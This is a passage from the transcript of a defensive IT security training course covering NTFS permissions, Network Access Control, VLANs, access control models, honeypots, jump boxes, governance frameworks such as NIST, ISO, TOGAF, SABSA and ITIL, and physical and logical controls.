OK. [Then the Multiple Names Found dialog box closes. The Select User, Computer, Service Account, or
Group dialog box reappears and he clicks the OK button. Then this dialog box closes and the Advanced
Security Settings for UserDataFiles dialog box reappears.] Now what we want to do is click the View
effective access button down below. [Then a table with three columns and several rows appears below the
View effective access button. The column headers are Effective access, Permissions, and Access limited
by.] Now as we kind of scroll down, so we can see what happens here. Notice that what we do see is that they
do have the ability – there is a green checkmark here, and this little picture of a group which means the user
got it through group membership – that the HelpDesk User1 has the ability to create folders, but they can't
write or delete or do anything like that. So therefore, user files are protected from that. So we've solved our
issue, we've given only the required permissions in our scenario that is required for the Help Desk group. In
this video, we learned how to set NTFS file system permissions.
After completing this video, you will be able to recognize the purpose of controlling network access with
Network Access Control (NAC).
Objectives
[Topic title: Network Access Control. The presenter is Dan Lachance.] The first line of defense for network
security is limiting who can connect to the network in the first place – whether it's wired or wireless. In this
video, we'll talk about Network Access Control. This is often referred to as NAC – N-A-C. And it applies to
connectivity points or edge point devices on the network. Things like network switches, wireless routers, VPN
appliances, dial-in appliances, and so on essentially entry points to the network. Network Access Control
components include the supplicant – this is the client device that's attempting to connect to a network. So it
could be an end user with their smartphone or their laptop or a desktop or tablet device. An endpoint device is
also referred to as a RADIUS client. Now you have to be careful not to confuse that with the supplicant.
So the RADIUS client is not the end-user smartphone or a laptop, for instance, trying to connect through a
VPN, those are called supplicants. A RADIUS client is an edge point network device like a switch, a VPN
device, or a wireless router. Endpoint devices, however, should never perform authentication because they're
on the edge of the network. They potentially could be compromised. And, if they are compromised, we don't
want credentials revealed from those devices. So, instead, they should use an authentication server where they
forward authentication requests. Now the authentication server is simply called a RADIUS server. And this
centralized authentication host should exist on a protected internal network – our endpoint devices will forward
requests to it.
IEEE 802.1X is a security standard. It's port-based Network Access Control where a port is simply a logical
connection to the LAN somehow. It uses EAP – E-A-P, which stands for Extensible Authentication Protocol.
Now only EAP traffic is initially allowed when a device initially attempts to connect to the network until after
successful authentication. This is called EAPOL or EAP over LAN. This means that the client device, the
supplicant won't even have a valid IP address until after successful authentication because our endpoint device,
let's say it's an Ethernet switch – does have an IP address that can communicate with our central RADIUS
server to ensure authentication succeeds first.
Now in order to be IEEE 802.1X compliant, your equipment may support it. It may simply need a firmware
update, things like wireless routers or network switches. In some cases, you might actually have to replace
your existing endpoint devices. IEEE 802.1X can also integrate with intrusion detection systems, IDSs or
intrusion prevention systems, IPSs, SIEM system, which is used for a security monitoring environment as well
as mobile device management or MDM solutions. Wireless routers can support WPA – Wi-Fi Protected
Access – or WPA2-Enterprise. Now WPA on a wireless network simply means a preshared key is configured
on the wireless router and that must be known by the connecting wireless clients.
However, WPA2-Enterprise is considered more secure than WPA or WPA2 preshared keys – PSKs. Now the
preshared key is simply a symmetric key but when we use the enterprise for WPA or WPA2, it uses a RADIUS
server, a central authentication server where we configure the RADIUS server IP address and listening port,
which has a default of UDP 1812. Also, a RADIUS client like a VPN appliance or a wireless router needs to be
configured with a shared secret, which is also configured on the centralized RADIUS authentication server. So
the key is used between RADIUS clients and servers and it is case sensitive.
[The web page of ASUS Wireless Router RT-N66U is open. Along the top of the screen are the Logout and
Reboot buttons. The rest of the page is divided into two parts. The first part includes three sections: the Quick
Internet Setup, General, and Advanced Settings. The General section includes the Network Map, Guest
Network, and AiCloud 2.0 tabs. The Advanced Settings section includes the Wireless, LAN, and WAN tabs. The
second part is divided into two sections. The first section includes a diagram. The diagram includes three
subsections. The first subsection includes the information about the Internet status. The second subsection
includes the information about the security level. The third subsection includes the information about the
clients and the USB devices that are connected. The second section is the System Status. This includes the
2.4GHz tab, the 5Ghz tab, and the Status tab. The 2.4GHz tab is open. It includes the Wireless name(SSID)
text box and the Authentication Method drop-down list.] On the screen, currently, you can see an ASUS
wireless router. And over on the right, under the System Status section, we can see that the Authentication
Method is configured for WPA2-Personal, which uses a preshared key. Here it's using AES encryption. So
there is a preshared key configured down below and that must be known by connecting clients. However, from
the Authentication Method drop-down list, what we could do is use for instance WPA2-Enterprise. [As soon
as Dan selects the WPA2-Enterprise drop-down option, the WPA-PSK key text box disappears.] Notice we
lose the field for their preshared key because that doesn't get used, instead, what I would do is click on
Wireless over on the left.
Now what you click on will vary greatly from one Wireless router admin page to another. [He selects the
Wireless tab and the Wireless tabbed page opens in the second part. The top of the page includes the General
tab, the WPS tab, and the RADIUS Setting tab. By default, the General tabbed page is open. The General
tabbed page includes the Band drop-down list, the SSID text box, and the Apply button.] But, anyways, here
I'll then click on the RADIUS Setting tab up at the top. [The RADIUS Setting tabbed page opens. It includes
the Band drop-down list, the Server IP Address text box, the Server IP Address text box, the Server Port text
box, the Connection Secret text box, and the Apply button.] And this is where I would specify the Server IP
Address of the centralized RADIUS authentication server. [He is referring to the Server IP Address text
box.] You can see that the listening port defaults to 1812. [He is referring to the Server Port text box.] And
then I configure the connection or shared secret that was configured on the RADIUS server. [He resumes the
explanation of the Network Access Control.] One final aspect of Network Access Control is client or
supplicant health checks – not to be confused with the RADIUS client.
We're talking about the actual end-user device like a smartphone or a laptop attempting to connect to the
network. So the health of that device can be checked where some configurations can be autoremediated. So the
things that might be checked in terms of health would be whether or not a malware scanner is functional and
up to date – whether a firewall is turned on on the device, whether updates have been applied, and whether
correct hardware peripherals exist – which might be required, for instance, for multifactor authentication. Now
autoremediation might mean, for instance, that if the firewall is there but not turned on on a connecting device,
it might be turned on so that the device is compliant and can continue to connect to the network. In this video,
we discussed Network Access Control.
Upon completion of this video, you will be able to recognize the purpose of network segregation using virtual
LANs.
Objectives
[Topic title: VLANs. The presenter is Dan Lachance.] In this video, we'll talk about VLANs. A VLAN is a
virtual local area network. It allows us to create a LAN which is considered a broadcast domain. And what that
means is that when a device sends out a broadcast to everyone, it is read by all devices on that LAN. VLAN is
applied at Layer 2 of the OSI model. That's the data-link layer which applies also to MAC addresses. A VLAN
is configured within a switch which is where the word virtual comes from, from VLAN.
All switch ports, however, by default are in the same VLAN. VLANs can also consist of some plugged in
devices in the switch or all of the devices. It depends how we can figure the VLAN which we'll go over
shortly. VLANs can also span multiple switches that are linked together. The purpose of a VLAN can be either
for a performance to break a larger network into smaller segments, which means we end up with multiple
broadcast domains – so multiple VLANs. Or we might have multiple VLANs for the purposes of security to
keep certain network devices isolated from others.
Now VLAN traffic from one VLAN doesn't talk to other VLANs without a router just like if you had physical
local area network segments that were separate, you would need a router to link them together. Now a Layer 3
switch applies to Layer 3 of the OSI model that's the network layer, which has routing capabilities built in. So
therefore, Layer 3 switch can link VLANs without an external need for a router. Now we might, for example,
have a VLAN that's used for imaging, which consumes a lot of bandwidth. And we might also have a different
VLAN for security purposes to keep accounting staff network traffic on its own network.
There are different types of VLAN configurations, the first of which is a switch port membership VLAN. So in
another words, it depends on the physical switch port that a device is plugged into. That determines the VLAN
that it's a member of. This would apply to OSI Layer 1 since we're talking about physical characteristics and
things that are plugged in with cables and connectors. The VLAN ports in this case do not have to be
contiguous – although in our pictured diagram they are [A diagram of Ethernet switch is displayed. It contains
eight ports.] – where on the left, the leftmost four ports are part of the OS imaging VLAN whichever devices
are plugged in. And on the right, the rightmost ports are for the accounting VLAN.
So it's important then when we plug devices into a network switch that we are conscious of how VLANs have
been configured. So plugging a station into a specific switch port could be a problem where it can't
communicate with the server it needs to talk to. Whereas, if you plug that into a different switch port and it
puts it on the right VLAN, maybe it would be able to talk to the server. So moved computers might require
either switch VLAN reconfiguration or you simply might have to plug it in to the correct port. We could also
configure MAC address-based VLANs. The MAC address is the 48-bit unique hardware address burned in the
network cards. It's also got a Layer 2 address. The Layer 2 applies to the OSI model that's the data-link layer.
So devices then with specific MAC addresses would be considered on the same VLAN. Each MAC address of
each device is associated with a specific VLAN. It's important to realize, of course, that switches already track
all of the MAC addresses plugged into specific ports on a switch. So for example, a given 48-bit hex MAC
address might be assigned to VLAN number 5. We can also create IP subnet VLANs, in other words, based on
the IP address of the plugged in device.
This would apply to OSI Layer 3 – the network layer. So devices with a specific IP network prefix are
considered to be on the same VLAN. So therefore, it wouldn't matter then which physical switch port the
device would be plugged into. Routing would allow VLANs to communicate with each other. So for example,
we could have a specific IP network prefix or address that is configured to be on a specific VLAN. [Subnet of
VLAN 5 is 25.1.2.3 and of VLAN 10 is 26.1.2.3.]
Other VLAN membership types include being configured for certain protocols. So for instance, using the IP
versus the IPX protocol suite or even using higher-level software or services to determine VLAN membership.
For instance, FTP traffic could place devices on an FTP-specific VLAN for that type of traffic. In this video,
we discussed VLANs.
Find out how to identify various conditions that restrict access to resources.
Objectives
[Topic title: Determining Resource Access. The presenter is Dan Lachance.] In this video, we'll talk about
resource access. A resource is something that we can connect to over a network like a file server, a database
server, a web application, and so on. So, when we determine resource access, we're talking about authorization
to use the resource. And authorization can only occur after successful authentication. Authentication is the
proving of one's identity, whether it's a user entering a username and a password or a specific smartphone with
a trusted PKI certificate being allowed to connect to a VPN as an example. ACLs are access control lists that
determine privileges that are granted or denied. Now you could have ACLs that apply at the network level. A
network ACL is something you would see on a packet filtering firewall to control traffic into and out of a
network, but then you could also see an ACL for a database that controls access to do certain things like insert
or update rows in the database table or it could be related to permissions granted to a folder on a file server and
so on. So there are many different incantations then of ACLs.
There are also other attributes that determine access to resources such as time-based, rule-based, location-
based, and role-based configurations. Let's take a look at each of those starting with time based. With time-
based resource access, we need to have a reliable time source. In a network environment, that really means
we're talking about using the Network Time Protocol or NTP to keep time in sync among multiple network
devices. We might have specific days and times where access is allowed. For example, SSH traffic from a
specific subnet to specific hosts might only be allowed during business hours. We might also have different
types of access depending on the time of day. For example, we might ensure that nobody is connected to a
server at 8:00 p.m. during weeknights because of backups.
We might also configure this time-based resource access through policies or on a specific network device. So
we might use centralized Microsoft Group Policies in Active Directory to configure this resource access or it
might be configured on a single device like a Cisco router. Now naturally, when it comes to troubleshooting,
IT technicians need to be aware if this type of time-based resource access is in use because without knowledge
of how this is configured, it could take a long time to troubleshoot why a user can't connect to a resource when,
in fact, it simply might not be allowed based on this type of configuration.
Then there is rule-based access control, which is also referred to as RBAC or sometimes ABAC where the "A"
stands for attribute-based access control. Basically, what this means is we are using conditions or rules that
determine resource access. An example of this is the Microsoft Windows Server 2012 R2 Dynamic Access
Control or DAC. This means, for example, users might have to belong to a group such as HR, but at the same
time, they have to be full-time employees and they might then get read/write privileges. Now full-time
employees could be determined through group membership, but one of the great things with condition or rule-
based access control is that we don't have to use groups. So, in the case of a Windows user – an Active
Directory user account – maybe there's an attribute filled in that determines whether that user is full-time or
not. So Dynamic Access Control can look at Active Directory attributes instead of just the traditional group
membership.
Location-based access control can also be referred to as LBAC. This is where the physical location of a user or
more specifically a device that they're using determines what access they have to resources. In the case of a
mobile device, we might use GPS tracking to determine the proximity of the user to a certain location or a
wireless network. Geofencing, for example, might disable mobile device cameras when the user is using that
mobile device within a secured area within a facility.
Role-based access control is also often referred to as RBAC. So, whenever you see RBAC, be careful to look
at the context in which that term is being used to ensure that you know whether it's referring to rule-based
access control or, as we're discussing now, role-based access control. With role-based access control,
privileges are assigned to roles. Users are then assigned to the roles. And therefore, they inherit the
permissions assigned to the role they're assigned to. Now this will facilitate access control list management in
larger companies because it's too difficult to manage, on a large scale, individual resource permissions granted
to individual user accounts. In this video, we discussed how to determine resource access.
recognize the purpose of intentionally creating vulnerable hosts to monitor malicious use
[Topic title: Honeypots. The presenter is Dan Lachance.] One way to detect malicious use is to configure a
honeypot. A honeypot is designed to monitor unauthorized use where detection of the activity is key. This is
made simple with virtualization where there are plenty of virtual appliances we can download or we could
build on our own virtual machine that has a few security vulnerabilities that would attract malicious users,
essentially its low hanging fruit. However, we want to be careful with unpatched DMZ systems.
We want to make sure that a compromised honeypot device doesn't let the attacker into other systems. And, at
the same time, it can also open us up to potential liability claims. Honeypot should be configured to forward
their logs to another secured host elsewhere because the assumption is that the honeypot itself could become
compromised. And, if it does, then any log information – which is what we're looking for here with the
honeypot – well, potentially it could be wiped by the attacker.
Honeypots come in various forms and apply to different levels. We can have an entire server operating system
being configured as a honeypot so we can track malicious activity against it. Or we could have a honeypot for
a specific service such as a vulnerable HTTP web service. Or we could have a honeypot for an individual file
or folder in which case it's called a honeytoken.
The HoneyDrive honeypot is a Linux-based virtual appliance that you can download. And it's out of the box
ready to go as an SSH honeypot, a web site honeypot. It also includes a wide variety of monitoring in
analytical tools to analyze SSH and web site traffic for malicious users. [The BruteForce Lab's Blog web page
is open. The page includes Home tab, About Me tab, and Miscellaneous drop-down list. By default, the
HoneyDrive tabbed page is open and the Miscellaneous drop-down list is selected. The Miscellaneous drop-
down list includes the DeltaBot, pyMetascan, and phpMetascan drop-down options.] If you plug HoneyDrive
honeypot into your favorite web search engine, it will be very easy to pull up the HoneyDrive honeypot web
page where you can see a description of what it is, you've got a download link, an installation set of
instructions, and a list of all of the features. So essentially, this is a virtual appliance that will run in different
virtualization environments.
[Dan resumes the explanation of honeypots.] So what is the real benefit of a honeypot? Well, its primary
purpose is to identify attack patterns, attacker identities in some cases, and then we can take those results and
further harden similar systems or services based on our findings from the honeypot. However, drawbacks
include the fact that there could be a liability if the honeypot, for instance, is used to target other victims
elsewhere. The other reality is that, from a legal standpoint, honeypot case law is very difficult to find. So there
really are no precedents on which to base current situations on.
Upon completion of this video, you will be able to recognize the purpose of a jump box.
Objectives
[Topic title: Jump Box. The presenter is Dan Lachance.] In this video, we'll discuss jump boxes. A jump box
is a secured computer that administrators go through to administer other devices. So it's a central and definable
entry point for administration. Now we must make sure that we harden the jump box itself, which is a
computer through which admins go to administer other devices, but also hardening of the originating
administrative computer is also very important where we might use a clean virtual machine whose purpose is
only administration, nothing additional gets installed on it.
Now, in terms of network precautions, we should always make sure we're using some type of encryption of all
network transmissions, whether we're using an IPsec VPN or we might also consider the use instead of or in
addition to an isolated VLAN so that administrative traffic is kept separate from regular end user IP traffic. We
should also consider the targeted systems that will be administered by administrators. They must be
configured. For example, their host-based firewalls should only allow connections from the jump box. We
should also make sure that the jump box computer itself cannot access the Internet because the last thing we
want to happen is for an administrator using the jump box maybe to download a driver from the Internet – for
example – and infect that jump box, which in turn has connections to other servers.
On the originating administrative station or host, there are precautions that we can take to protect our network.
First is to create a process whitelist – in other words, only the allowable processes that are allowed to run on
the originating administrative workstation. We can then determine which accounts are used to log on to that
system. So only administrative accounts, for example, should be allowed to log in to that originating system.
The originating system should also use multifactor authentication. Ideally, you might even use centralized
RADIUS authentication with auditing. Now host logs from this originating system should be forwarded to
another host because if it's compromised, the logs could be wiped.
A jump box arguably is a compelling target for malicious users. And the reason for this is quite simple because
if the jump box gets compromised, that could then give access potentially to multiple internal servers that are
administered through the jump box. On the scalability discussion, you could look at this from two perspectives.
So you could say that a jump box scales well because you've got a definable entry point for managing a
multitude of servers, whether they're on premises in the cloud or both. But, on the other hand, you could say
that it doesn't scale well. And that really depends on specifics but for example, if we're talking about hundreds
of administrators connecting through a single jump box to administer hundreds of internal servers elsewhere,
yes, it could be a scalability issue. So you might need more than one jump box. You might even configure it as
a load balance type of configuration.
In this video, we talked about jump boxes.
Table of Contents
After completing this video, you will be able to explain how proper IT governance results in secured IT
resources.
Objectives
[Topic title: IT Security Governance. The presenter is Dan Lachance.] IT security relates to risk. And risk
management is a very important responsibility. In this video, we'll talk about IT security governance.
IT security strategies need to align with business objectives because that's why IT systems are used in the first
place. There could be legal and regulatory compliance reasons that we have certain security controls in place.
We also have to consider their influence potentially on organizational security policies. Security governance
also deals with the responsibility related to the IT security strategy for the organization.
The oversight of risk management relates to IT security managers that must make decisions about effective
security controls that protect assets. IT security governance also deals with decision-making power and where
it lies. The creation of security policies and also the allocation of resources to protect assets fall under the
umbrella of IT security governance. IT security management deals with the enforcement of those security
policies and the actual usage of those resources. So notice the distinction then between IT security governance
and IT security management.
NIST, the National Institute of Standards and Technology in the United States, lists five common areas of IT
security governance where there is the protection of organizational assets, there is the protection of the
organization's reputation, there is the protection of shareholders, there is the acceptable use of IT systems by
organization employees, and of course, there is the assurance of legal and regulatory compliance.
With IT security governance, accountability for the IT security strategy falls upon the leaders. Related costs
are also considered – the costs that are required to stay in business. You can't get away without spending a
penny on IT security in a large organization. It is the cost of doing business. However, it needs to be worth the
investment and it has to, of course, be worth the asset that's being protected. User awareness and training is
very critical in assuring that everyone knows what the organization's specific IT strategy is. IT security
governance also implies that there is ongoing monitoring and review of security controls to ensure their
effectiveness in protecting assets.
After completing this video, you will be able to recognize how compliance with regulations can influence
security controls.
Objectives
Regulations will vary from industry to industry and also from jurisdiction to jurisdiction around the globe.
However, regulations can have an influence over the organization security policy, acceptable use policies, and
also the selection of which security controls will be used. So for example, specific data sanitization or wiping
tools might be required for law enforcement when wiping hard disks before equipment is decommissioned.
Confidentiality could also be a part of regulatory compliance where we are preventing the unauthorized access
of sensitive data. So encryption might be required for data in use, data in motion such as that being transmitted
over a network, and data at rest such as data being stored on disks either on premises or in the cloud. In some
cases, regulations might detail what are acceptable algorithms that are used for the encryption.
Regulatory compliance can also stipulate how we verify data integrity or the trustworthiness of data. There
might be certain authentication controls that must be put in place such as multifactor authentication, which is
required to connect to a sensitive network. Or there might be hashing that is required to generate a unique
value on data so that in the future when we run that calculation again, we can detect whether or not a change
has occurred because if a change has occurred, the unique value or hash will be different than the original hash.
Regulatory compliance can also apply to the availability of IT systems, networks, and data so that data is
available when it's needed. Now this might require us to use clustering solution so that network services are
running on multiple hosts. And, should one host fail, users will be redirected to that same network service
running on another host. Now, in order for the data to be kept up to date and consistent, clustered servers might
use shared storage. We might also use replication to replicate data to other locations or even to synchronize it
to the cloud. So we have another copy that's available if something happens to the primary copy of data. Now,
if we're going to do that, we should look very carefully at our cloud service-level agreement or SLA to make
sure that we know exactly what the availability promises are from that specific provider.
Some examples of regulations include Canada's PIPEDA. This is the Personal Information Protection and
Electronic Documents Act where it relates to data collection and how it will be used for private information. In
the United States of America, we've got HIPAA – the Health Insurance Portability and Accountability Act –
which controls how sensitive information is shared between US government agencies. In the European Union,
we've got the EU Data Protection Directive – Directive 95/46/EC – which deals with the protection of personal
data in and outside of the European Union.
Find out how to apply NIST's Cybersecurity Framework to your digital assets.
Objectives
apply NIST's Cybersecurity Framework to your digital assets
[Topic title: NIST. The presenter is Dan Lachance.] Standards are an important aspect of computing including
as it relates to security. In this video, we'll talk about NIST.
NIST stands for the National Institute of Standards and Technology in which there is a division called the
Computer Security Resource Center or CSRC. This division deals with the protection of information systems
in terms of tools that can be used and best practices to be followed.
FIPS stands for Federal Information Processing Standard. And it's a guideline used by US government
agencies. FIPS 201-2 deals with personal identity verification of federal employees and contractors. [Dan is
referring to Personal Identity Verfication of Federal Employees and Contractors for the year 2013.] Now this
can be done in a variety of ways by using smart card authentication where the possession of the physical card
is required in addition to knowledge of the PIN for the smart card. There are also specific card reader
requirements that must be met for the use of smart cards. There are certain cryptographic algorithm
requirements to be trusted that are part of FIPS 201-2 as well as the use of biometric authentication. Biometric
authentication is based on some unique characteristic that someone possesses such as their fingerprint or their
retinal scan.
FIPS 197 deals with the advanced encryption standard as of 2001. It supersedes the 1970s-derived DES or
Digital Encryption Standard. AES uses the Rijndael algorithm. And it's applied to both software and firmware.
So it can be used in many different devices or many different operating systems and applications. AES is a
symmetric block cipher that supports 128, 192, and 256 bits.
FIPS 186-4 is the digital signature standard. It defines acceptable methods that can be used to create unique
digital signatures. The purpose of a digital signature is to verify the authenticity of the originator – the sender
of a message. For example, in the case of e-mail, the sender generates a unique digital signature using their
private key to which only they have access. Now, in the receiving end, we can detect whether tampering has
taken place because we'll use a mathematically related public key to verify that the signature value is the same.
If it's different, something has changed. The digital signature standard also deals with nonrepudiation where an
originator cannot deny having sent the message because it was created with the private key to which only they
have access.
During this video, you will learn how to apply ISO security standards to secure your environment.
Objectives
apply ISO security standards to harden your environment
[Topic title: ISO. The presenter is Dan Lachance.] In this video, I'll discuss ISO.
ISO stands for the International Organization for Standardization. It is a series of standards and best practices
that can be adopted by organizations. In some cases, organizations might require ISO compliance and so,
therefore, must follow standards and best practices as suggested. ISO publishes numerous documents including
ISO/IEC 27033-5. Now this deals with securing communications across networks using virtual private
networks or VPNs. So it will detail VPN types, how VPN appliances are configured, and how VPN
connections supply confidentiality through various encryption methods. Confidentiality prevents sensitive
information from being accessible by unauthorized users.
ISO/IEC 27039 deals with the selection, deployment, and operations of intrusion detection and prevention
systems, otherwise called IDPS. [Dan is referring to the ISO/IEC 27039:2015.] This deals with host analysis
in the case of analyzing suspicious activity on a host itself or network analysis when we're detecting network
traffic looking for suspicious activity. In the case of network analysis, we've got to be conscious about
placement of the device or the solution on the network. So we can see the relevant traffic. It also deals with
IDS and IPS tweaking within a specific environment. All network environments are a little bit different from
one another. And as such, what's normal activity on one network might not be normal on another. So tweaking
is crucial. There are also IDS and IPS appliances that come in both hardware form as well as virtual machine
form that we can use in order to adhere to this ISO standard.
[The ISO/IEC 27039:2015(en) web page is open in the www.iso.org web site.] I've gone into my favorite
search engine and searched up ISO 27039. [The ISO/IEC 27039:2015(en) web page is divided into two
sections. The first section is the navigation pane. The second section is the content pane.] And here we can see
the details related to this specific standard. So, as we go through this document, which is available on the
Internet, we can see how it relates to intrusion detection and prevention systems and the guidelines or
recommendations that are part of this ISO standard. Now bear in mind, some organizations or government
agencies might require ISO accreditation. [He resumes the explanation of the ISO.] ISO/IEC 30121 deals with
the governance of digital forensic risk frameworks. This is more related then to the gathering of evidence and
ensuring that evidence is kept safe and not tampered with. So the guidelines are for preparing for digital
investigations. It deals with evidence availability and adherence to the chain of custody.
Upon completion of this video, you will be able to recognize how the TOGAF enterprise IT architecture can
increase the efficiency of security controls.
Objectives
recognize how the TOGAF enterprise IT architecture can increase efficiency of security controls
[Topic title: TOGAF. The presenter is Dan Lachance.] There are many different frameworks that can be
adhered to when securing an IT infrastructure. In this video, we'll talk about TOGAF.
TOGAF stands for The Open Group Architecture Forum. This is an enterprise architecture framework that
deals with improving resource efficiency. Now, as a result of that or as a by-product of that, we are improving
upon the return on investment in IT solutions. It also deals with process improvement. This is ongoing. So
periodic monitoring will ensure that business processes are efficient and effective as it relates to the IT systems
that support those processes. So, in the end, TOGAF really deals with improved business productivity.
On the IT efficiencies side, part of that involves application portability so that applications can be run on a
variety of platforms or in a variety of environments. So for example, part of TOGAF IT efficiencies details the
vendor lock-in problem. Now, in the case of public cloud providers, the last thing that we want is to be locked
into a specific cloud provider solution because we're using a proprietary solution that wouldn't work correctly
or without a major investment with a different provider. So this is something that has to be considered in the
case of an enterprise looking, in this particular example, at public cloud solutions. Other IT efficiencies related
to TOGAF include the rapid and cost-efficient procurement of IT solutions. And we have to be careful with
this one because we don't want to sacrifice security at all phases of development of the solution, but it does
relate to things like cloud rapid elasticity. This is one of the pillars of cloud computing – the ability to rapidly
provision IT resources as required and also the rapid ability to deprovision those resources when no longer
needed.
TOGAF also deals with stakeholder concerns where it addresses conflicting concerns. For instance, dealing
with the cost of an effective security control might not be something that an organization is ready to jump on
immediately if not absolutely required. Yet, at the same time – if we're talking about protecting customer
information – well, the customer would be a different type of stakeholder where, of course, it is in their interest
to protect their data. So we could have conflicting concerns that have to be carefully weeded out and addressed
so that all parties are kept happy and that we adhere to the required laws or regulations. Also, there needs to be
consistency with how stakeholder concerns are dealt with. Organizational policies will deal with this as well as
business processes.
In the end, it's important that all of our IT solutions support business processes so that we make sure our
solutions have some kind of return on investment over time because they aligned with business needs. Data
governance is also a part of TOGAF where we have data custodians that are required to take care of data.
Things like dealing with access to data, the backup of data, making sure data is highly available, making sure
that we adhere to laws and regulations as related to certain types of data such as personally identifiable
information or PII that must be kept under strict lock and key and that will vary in different parts of the world
in terms of exactly how that is done.
Data governance also deals with data migration. Now data migration could be reflected when we're looking at
moving to a public cloud solution where data exists currently on-premises. There is also the whole issue of big
data management and data analytics related to big data. With today's large volumes of data, we need effective
solutions to be able to process that data effectively. And usually, how that works out is by using some kind of
large scale distributed processing solution such as a Hadoop cluster.
recognize how to assess risk and apply effective security controls to mitigate that risk
SABSA is another framework. And it stands for Sherwood Applied Business Security Architecture. This
framework deals with security as related to business processes. So it's really an enterprise security architecture
that deals with enterprise service management. And its core driving factor is analyzing risk to assets that have
value to the organization. So SABSA then results in security solutions that support business objectives
directly.
SABSA consists of integrated frameworks. It's really the best of multiple worlds. Some of those integrated
frameworks include TOGAF, The Open Group Architecture Forum, as well as ITIL – the IT Infrastructure
Library – where those frameworks deal with making sure that we have very efficient business processes that
support business requirements and that are also secured with effective security controls. Now SABSA also has
a number of methods for implementation and these are standards based on NIST and ISO publications that are
related to things like business continuity and security service management. There are also legal and regulatory
compliance factors that have to be considered with SABSA and that will vary from one organization to the
next in different parts of the world in different industries.
The SABSA lifecycle begins with the planning phase where business requirements and related risk are
assessed. In the design SABSA phase, we can either look at existing security tools that we deem are effective
in protecting assets or processes or we could develop custom solutions. The idea is that security has to be a part
of all phases. Of course then, once we have designed our solution, we can make sure it gets implemented
properly and then managed and monitored over time. Now monitoring, of course, is an ongoing task to ensure
that business objectives are still met in a secure and efficient manner.
SABSA roles and responsibilities include those such as data custodians. Data custodians may not necessarily
make the rules about how data should be treated, but they must enforce them and make sure that data is
available, for instance, that is being backed up or that there is a clustering solution for data high availability or
that data is wiped or sanitized in an acceptable manner and so on. Then there are roles such as service
providers and consumers, which are bound in their activities by the service-level agreement or the SLA. In the
case of a public Cloud provider, for instance, the SLA will guarantee a certain amount of uptime usually
expressed as a percentage on a monthly basis.
Then of course, there is the inventory of assets that have value to the organization. This can be manual or
automated. And then there are network and host layout diagrams for configuration and security controls.
SABSA also deals with things like personnel management at the human resources or HR level. Things like
background checks, responsibilities for employees, and access control lists whereby the principle of least
privileges follow to ensure that people only have the privileges they need to perform a specific job function.
After completing this video, you will be able to recognize how to apply ITIL to increase the efficiency of IT
service delivery.
Objectives
[Topic title: ITIL. The presenter is Dan Lachance.] In this video, I'll discuss ITIL.
ITIL stands for Information Technology Infrastructure Library. And one of the ideas behind ITIL is to
efficiently deliver IT services that meet business needs. IT service management makes sure – besides aligning
to business needs – that business processes are supported with our IT solutions, that we can quickly adapt to
change and growth, and that we have got the efficient and effective delivery of IT services as required.
Starting with the Service Strategy and Service Design part of ITIL continuous improvement, with designed, we
must identify services that need to be provided, define how they'll be provided, and identify the need for them.
Now that also includes planning items such as the cost related to these required services and the way to
efficiently provide these services at a minimized cost. With the Service Transition portion, we're dealing with
things such as patch management for an IT solution as well as new versions of software that must be managed
over time. With Service Operation, we're really talking about configuring our IT solutions to meet business or
customer needs. And also, this is really the continuous life cycle of service improvement over time.
ITIL does not specify specific IT operational "how tos." It also is not a collection of best practices, but it does
provide various solutions to make IT system secure and efficient. It can also provide a service migration road
map from on-premises solutions to cloud provider solutions.
ITIL includes some recommendations on how to engage appropriate stakeholders whether they would be CIO
– Chief Information Officers – customers, end users within the organization, and so on. But ITIL is designed to
focus on customers and their needs. Of course, ITIL also allows us to mold this framework to our
organization's specific business processes so that we can standardize processes. And, by doing that, we enable
a quicker response to change when change is required. Now ITIL is continual service improvement over the
long term. So like a great investment, you have to be patient. It's designed to show improvement over time, but
it is ongoing and it requires diligent continuous monitoring.
[Topic title: Physical Controls. The presenter is Dan Lachance.] In this video, we'll talk about physical
controls.
Physical controls are right up there alongside user awareness and training as being simple common-sense
security solutions that are often overlooked. We need to think about risk countermeasures as related to physical
controls so that we can protect sensitive data, IT systems, of course physical property, as well as intellectual
property.
Threat scenarios as related to physical security controls include malicious users booting from alternative
media. What we could do to countermeasure that is to set a BIOS password. Then there is the threat of the
retrieval of sensitive data from USB thumb drives or mobile devices – both of which are easy to lose or to have
stolen. So one way to counteract that threat is to encrypt data at rest on these types of devices and also in the
case of mobile devices to enable remote wipe. There is also the threat of network traffic being captured and
analyzed. Well, other than the obvious of encrypting network transmissions physically, we might want to
control access to the network. We might do that using network access control or NAC with centralized
RADIUS authentication. But, at the physical level – if you think about, let's say, a reception area in an office –
any network wall jacks should probably be disabled. We don't want someone coming in with a laptop and
plugging into a wall jack behind a plant and gaining access to the network. The same, of course, applies to
wireless networks.
Then there are physical controls related to physical buildings and facilities or even floors within buildings.
Things like fencing to keep people out, proper lighting, security guards, security cameras, the use of ID badges
for personal identifications – especially after hours and even during work hours – mantraps, which require that
an outer door be closed before a second inner door allows access to a facility. So there are various security
systems, such as alarm and sensor systems, that can be used to physically protect buildings, facilities, and even
floors within buildings.
We should also consider the fact that in the event of a catastrophe, our data needs to be available elsewhere. So
we might have data replication to alternative locations or we might have backed uptake stored offsite. We
should be using door locks to protect sensitive areas of a facility. Certainly, that would include server rooms
and even within a larger data center, the front and back of server room racks should be locked. In the case of
end-user laptops, we could also use lock-down cables so that when a user is working within a certain location,
such as at a customer site, she could use the lock-down cable to secure the laptop around the leg of a piece of a
heavy furniture to prevent its theft. There can also be controlled access to floors and rooms. We have probably
all encountered this going into work after hours with a passcard that allows us access to only certain floors in a
building or only certain rooms within a facility. In the case of power outages, there shall also be backup
generators so that we can still use our electronic security systems.
To identify logical security controls, consult a security specialist or look for information online.
Objectives
[Topic title: Logical Controls. The presenter is Dan Lachance.] In this video, I'll talk about logical controls.
So we know that physical controls include things like locked doors to server rooms, fencing around a building,
and so on. But what exactly are logical controls? Well, these are often called technical controls. They are
designed to enforce access control to resources such as access to a network or to an IT system or to specific
data within a system. Either way, logical controls must align with organizational security policy and there
needs to be continuous monitoring and evaluation of the effectiveness of these controls in protecting data. And
you will notice that this is a common theme with IT security – continuously monitoring and verifying that our
security solutions properly protect assets.
Authentication is a logical control. And it is the proving of one's identity. There are three types of
authentication categories including something you know like a password, something you have like a smart
card, and something you are such as a unique fingerprint. Multifactor authentication or MFA combines at least
two of these categories. Maybe it would include a smart card and a PIN – something you have and something
you know. Identity Federation is also a part of authentication that is becoming more and more popular these
days. Essentially, with Identity Federation, we have got a trusted central identity store. So, instead of having
